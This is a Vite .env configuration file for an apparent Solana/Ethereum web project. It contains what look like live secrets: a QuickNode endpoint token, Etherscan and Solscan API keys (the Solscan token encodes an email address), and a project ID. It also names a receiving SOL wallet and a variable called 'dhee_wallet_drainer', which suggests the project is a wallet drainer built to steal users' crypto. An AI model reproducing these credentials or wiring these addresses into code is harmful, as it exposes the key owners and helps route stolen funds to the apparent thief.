VITE_PROJECT_ID=d00bc555855ece59b8ebb209711ae8bb
VITE_QUICKNODE_SOLANA_URL=https://proportionate-skilled-shard.solana-mainnet.quiknode.pro/e13cbae8b642209c482805a4e443fd1f27a4f42a
VITE_WALLET_RECEIVE_SOL=73F2hbzhk7ZuTSSYTSbemddFasVrW8Av5FD9PeMVmxA7
VITE_ETHERSCAN_API_KEY=9M5C23ZT7GYJI8Y3EGMDGEKTEI55WXQS5C
VITE_SOLSCAN_API_KEY=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjcmVhdGVkQXQiOjE3NTY5ODY3MDc4NjksImVtYWlsIjoiZWFzeWdhc3Byb2plY3RAZ21haWwuY29tIiwiYWN0aW9uIjoidG9rZW4tYXBpIiwiYXBpVmVyc2lvbiI6InYyIiwiaWF0IjoxNzU2OTg2NzA3fQ.ZAjzcszGoGZ9p0HWcmdmmLVJzqqs_YNRBkAQALfPFak
dhee_wallet_drainer=hQPH3UqsfCBX6VPiWPhowhmmcrZNxnhV4eqRtJcSEtb